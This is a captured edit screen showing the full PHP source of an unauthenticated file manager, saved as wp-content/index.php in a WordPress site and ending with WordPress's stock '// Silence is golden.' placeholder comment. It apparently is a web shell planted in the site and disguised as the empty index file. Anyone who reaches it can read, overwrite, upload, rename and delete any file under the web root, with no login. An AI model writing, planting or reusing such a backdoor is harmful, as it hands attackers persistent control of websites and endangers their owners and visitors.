Current directory:
[site root]
/
wp-content
/
Back
Editing: index.php
<?php /** * Root-locked simple file manager. * * This version does not use JS for core actions. * Directory opening, edit, save, upload, delete and rename are checked server-side. */ /** * If DOCUMENT_ROOT is wrong on your hosting, set the root manually: * $ROOT_DIR = '/home/USER/public_html'; */ $ROOT_DIR = isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] !== '' ? realpath($_SERVER['DOCUMENT_ROOT']) : realpath(__DIR__); if ($ROOT_DIR === false) { die('Root directory not found'); } $ROOT_DIR = normalizePath($ROOT_DIR); function normalizePath($path) { return rtrim(str_replace('\\', '/', (string) $path), '/'); } function h($value) { return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8'); } function b64($value) { return base64_encode((string) $value); } function decodePathValue($value) { if (!is_string($value) || $value === '') { return false; } return base64_decode($value, true); } function isInsideRoot($path) { global $ROOT_DIR; $path = normalizePath($path); return $path === $ROOT_DIR || strpos($path . '/', $ROOT_DIR . '/') === 0; } function safeExistingPath($path) { if (!is_string($path) || $path === '') { return false; } $real = realpath($path); if ($real === false) { return false; } $real = normalizePath($real); return isInsideRoot($real) ? $real : false; } function safeDir($path) { $safe = safeExistingPath($path); return ($safe !== false && is_dir($safe)) ? $safe : false; } function safeFile($path) { $safe = safeExistingPath($path); return ($safe !== false && is_file($safe)) ? $safe : false; } function safeChildPath($dir, $name) { $safeDir = safeDir($dir); if ($safeDir === false || !is_string($name)) { return false; } $name = str_replace('\\', '/', $name); $name = basename($name); if ($name === '' || $name === '.' || $name === '..') { return false; } $childPath = normalizePath($safeDir . '/' . $name); return isInsideRoot($childPath) ? $childPath : false; } function getRequestedDir() { global $ROOT_DIR; $requestedDir = $ROOT_DIR; if (isset($_POST['d'])) { $decoded = decodePathValue($_POST['d']); if ($decoded !== false) { $requestedDir = $decoded; } } elseif (isset($_GET['d'])) { $decoded = decodePathValue($_GET['d']); if ($decoded !== false) { $requestedDir = $decoded; } } $safeDir = safeDir($requestedDir); return $safeDir !== false ? $safeDir : $ROOT_DIR; } function dirUrl($dir, $message = '') { $url = $_SERVER['PHP_SELF'] . '?d=' . rawurlencode(b64($dir)); if ($message !== '') { $url .= '&m=' . rawurlencode($message); } return $url; } function redirectToDir($dir, $message = '') { global $ROOT_DIR; $safeDir = safeDir($dir); if ($safeDir === false) { $safeDir = $ROOT_DIR; } header('Location: ' . dirUrl($safeDir, $message)); exit; } function humanFileSize($path) { $bytes = filesize($path); if ($bytes === false) { return '--'; } if ($bytes >= 1048576) { return round($bytes / 1048576, 2) . ' MB'; } return round($bytes / 1024, 2) . ' KB'; } function viewUrl($file) { return $_SERVER['PHP_SELF'] . '?view=' . rawurlencode(b64($file)); } function editUrl($file, $dir) { return $_SERVER['PHP_SELF'] . '?edit=' . rawurlencode(b64($file)) . '&d=' . rawurlencode(b64($dir)); } $currentDir = getRequestedDir(); $dir = $currentDir; // Kept for compatibility with old code. // View file as text / inline content. if (isset($_GET['view'])) { $decoded = decodePathValue($_GET['view']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { http_response_code(403); echo 'Access denied'; exit; } $mime = function_exists('mime_content_type') ? mime_content_type($filePath) : 'application/octet-stream'; if ($mime === false || $mime === '') { $mime = 'application/octet-stream'; } header('Content-Type: ' . $mime); header('Content-Disposition: inline; filename="' . basename($filePath) . '"'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } // Delete file. if (isset($_POST['del'])) { $decoded = decodePathValue($_POST['del']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { redirectToDir($currentDir, 'Access denied'); } $fileDir = dirname($filePath); if (@unlink($filePath)) { redirectToDir($fileDir, 'Delete successful'); } redirectToDir($fileDir, 'Delete failed'); } // Save edited file. if (isset($_POST['save'], $_POST['obj'], $_POST['content'])) { $decoded = decodePathValue($_POST['obj']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { redirectToDir($currentDir, 'Access denied'); } $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content']) !== false) { redirectToDir($fileDir, 'Saved'); } redirectToDir($fileDir, 'Save failed'); } // Rename file or folder. if (isset($_POST['ren'], $_POST['new'])) { $decoded = decodePathValue($_POST['ren']); $oldPath = $decoded !== false ? safeExistingPath($decoded) : false; if ($oldPath === false) { redirectToDir($currentDir, 'Access denied'); } $oldDir = dirname($oldPath); $newPath = safeChildPath($oldDir, $_POST['new']); if ($newPath === false) { redirectToDir($oldDir, 'Invalid new name'); } if (file_exists($newPath)) { redirectToDir($oldDir, 'Rename failed - target already exists'); } if (@rename($oldPath, $newPath)) { redirectToDir($oldDir, 'Renamed'); } redirectToDir($oldDir, 'Rename failed'); } // Create folder. if (isset($_POST['create_dir'], $_POST['new_dir_name'])) { $newDirPath = safeChildPath($currentDir, $_POST['new_dir_name']); if ($newDirPath === false) { redirectToDir($currentDir, 'Invalid folder name'); } if (file_exists($newDirPath)) { redirectToDir($currentDir, 'Folder already exists'); } if (@mkdir($newDirPath, 0755)) { redirectToDir($currentDir, 'Folder created'); } redirectToDir($currentDir, 'Create folder failed'); } // Create file. if (isset($_POST['create_file'], $_POST['new_file_name'])) { $newFilePath = safeChildPath($currentDir, $_POST['new_file_name']); if ($newFilePath === false) { redirectToDir($currentDir, 'Invalid file name'); } if (file_exists($newFilePath)) { redirectToDir($currentDir, 'File already exists'); } if (file_put_contents($newFilePath, '') !== false) { redirectToDir($currentDir, 'File created'); } redirectToDir($currentDir, 'Create file failed'); } // Upload file. if (isset($_POST['s'], $_FILES['u'])) { if ($_FILES['u']['error'] !== UPLOAD_ERR_OK) { redirectToDir($currentDir, 'Upload failed'); } $fileName = basename($_FILES['u']['name']); $tmpName = $_FILES['u']['tmp_name']; $destination = safeChildPath($currentDir, $fileName); if ($destination === false) { redirectToDir($currentDir, 'Access denied'); } if (!is_uploaded_file($tmpName)) { redirectToDir($currentDir, 'Invalid upload'); } if (@move_uploaded_file($tmpName, $destination)) { redirectToDir($currentDir, 'Upload successful'); } redirectToDir($currentDir, 'Upload failed - cannot write file'); } // Edit file screen. $editFilePath = false; if (isset($_GET['edit'])) { $decoded = decodePathValue($_GET['edit']); $editFilePath = $decoded !== false ? safeFile($decoded) : false; if ($editFilePath === false) { redirectToDir($currentDir, 'Access denied'); } $currentDir = dirname($editFilePath); } $message = isset($_GET['m']) ? trim((string) $_GET['m']) : ''; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>File Explore</title> <style> body { margin: 0; padding: 20px; background: #f3f3f3; color: #222; font-family: Arial, sans-serif; font-size: 14px; } a { color: #0645ad; text-decoration: none; } a:hover { text-decoration: underline; } .box, table { width: 92%; margin: 0 auto 16px; box-sizing: border-box; background: #fff; border: 1px solid #ccc; } .box { padding: 12px; } table { border-collapse: collapse; } th, td { border: 1px solid #ccc; padding: 7px; text-align: left; vertical-align: middle; } th { background: #e8e8e8; } textarea { width: 100%; height: 430px; box-sizing: border-box; font-family: Consolas, Monaco, monospace; font-size: 13px; } .message { background: #eef8ee; border-color: #9dcc9d; } .muted { color: #777; font-size: 12px; } .actions { white-space: nowrap; } .inline-form { display: inline; margin: 0; padding: 0; } .rename-input { width: 145px; } button, input[type="submit"] { cursor: pointer; } </style> </head> <body> <?php if ($message !== ''): ?> <div class="box message"> <?php echo h($message); ?> </div> <?php endif; ?> <div class="box"> <strong>Current directory:</strong> <?php echo '<a href="' . h(dirUrl($ROOT_DIR)) . '">[site root]</a>/'; $relativePath = trim(substr($currentDir, strlen($ROOT_DIR)), '/'); if ($relativePath !== '') { $parts = explode('/', $relativePath); $buildPath = $ROOT_DIR; foreach ($parts as $part) { $buildPath .= '/' . $part; echo '<a href="' . h(dirUrl($buildPath)) . '">' . h($part) . '</a>/'; } } ?> </div> <?php if ($editFilePath !== false): ?> <div class="box"> <p> <a href="<?php echo h(dirUrl(dirname($editFilePath))); ?>">Back</a> <span class="muted">Editing: <?php echo h(basename($editFilePath)); ?></span> </p> <form method="post"> <input type="hidden" name="obj" value="<?php echo h(b64($editFilePath)); ?>"> <input type="hidden" name="d" value="<?php echo h(b64(dirname($editFilePath))); ?>"> <textarea name="content"><?php echo h(file_get_contents($editFilePath)); ?></textarea> <p style="text-align:center;"> <button type="submit" name="save" value="1">Save</button> </p> </form> </div> <?php else: ?> <div class="box"> <form method="post" enctype="multipart/form-data" style="margin-bottom: 10px;"> <strong>Upload:</strong> <input type="file" name="u"> <input type="submit" name="s" value="Upload"> <input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>"> </form> <form method="post" style="margin-bottom: 10px;"> <strong>Create folder:</strong> <input type="text" name="new_dir_name" placeholder="folder-name"> <button type="submit" name="create_dir" value="1">Create folder</button> <input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>"> </form> <form method="post"> <strong>Create file:</strong> <input type="text" name="new_file_name" placeholder="file-name.txt"> <button type="submit" name="create_file" value="1">Create file</button> <input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>"> </form> </div> <?php $items = scandir($currentDir); if ($items !== false) { echo '<table>'; echo '<tr><th>Name</th><th>Size</th><th>Action</th></tr>'; foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $fullPath = safeExistingPath($currentDir . '/' . $item); if ($fullPath === false) { continue; } echo '<tr>'; if (is_dir($fullPath)) { echo '<td><a href="' . h(dirUrl($fullPath)) . '"><b>dir></b> ' . h($item) . '</a></td>'; echo '<td>--</td>'; echo '<td class="actions">'; echo '<form class="inline-form" method="post">'; echo '<input type="hidden" name="ren" value="' . h(b64($fullPath)) . '">'; echo '<input type="hidden" name="d" value="' . h(b64($currentDir)) . '">'; echo '<input class="rename-input" type="text" name="new" value="' . h($item) . '">'; echo ' <button type="submit">Rename</button>'; echo '</form>'; echo '</td>'; } else { echo '<td>fil> ' . h($item) . '</td>'; echo '<td>' . h(humanFileSize($fullPath)) . '</td>'; echo '<td class="actions">'; echo '<a href="' . h(viewUrl($fullPath)) . '" target="_blank">Open</a> | '; echo '<a href="' . h(editUrl($fullPath, $currentDir)) . '">Edit</a> | '; echo '<form class="inline-form" method="post" onsubmit="return confirm(\'Delete this file?\');">'; echo '<input type="hidden" name="del" value="' . h(b64($fullPath)) . '">'; echo '<input type="hidden" name="d" value="' . h(b64($currentDir)) . '">'; echo '<button type="submit">Delete</button>'; echo '</form>'; echo ' | '; echo '<form class="inline-form" method="post">'; echo '<input type="hidden" name="ren" value="' . h(b64($fullPath)) . '">'; echo '<input type="hidden" name="d" value="' . h(b64($currentDir)) . '">'; echo '<input class="rename-input" type="text" name="new" value="' . h($item) . '">'; echo ' <button type="submit">Rename</button>'; echo '</form>'; echo '</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div class="box">Unable to read directory!</div>'; } ?> <?php endif; ?> </body> </html> <?php // Silence is golden.
Save